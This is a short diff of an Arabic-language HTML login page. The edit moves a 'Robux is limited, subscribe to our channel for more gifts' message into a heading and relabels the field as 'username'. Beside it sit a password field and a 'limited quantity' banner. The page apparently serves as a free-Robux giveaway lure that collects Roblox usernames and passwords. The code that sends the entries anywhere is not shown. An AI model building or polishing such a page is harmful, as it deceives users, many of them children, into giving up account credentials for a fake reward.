--- a/index.html
+++ b/index.html
@@ -11,11 +11,11 @@
     <div class="container">
         <div class="login-box">
             <h2>الكمية محدودة</h2>
-            <h2>اسم المستخدم</h2> <!-- تغيير هنا -->
+            <h2>الروبوكس محدود _يرجى الاشتراك بقناتنا ايضا لنقدم المزيد من الهدايه</h2> <!-- تغيير هنا -->
             <form id="login-form">
                 <div class="user-box">
                     <input type="text" id="username" required> <!-- تغيير من email إلى username -->
-                    <label>الروبوكس محدود _يرجى الاشتراك بقناتنا ايضا لنقدم المزيد من الهدايه </label> <!-- تغيير النص هنا -->
+                    <label>اسم المستخدم </label> <!-- تغيير النص هنا -->
                 </div>
                 <div class="user-box">
                     <input type="password" id="password" required>
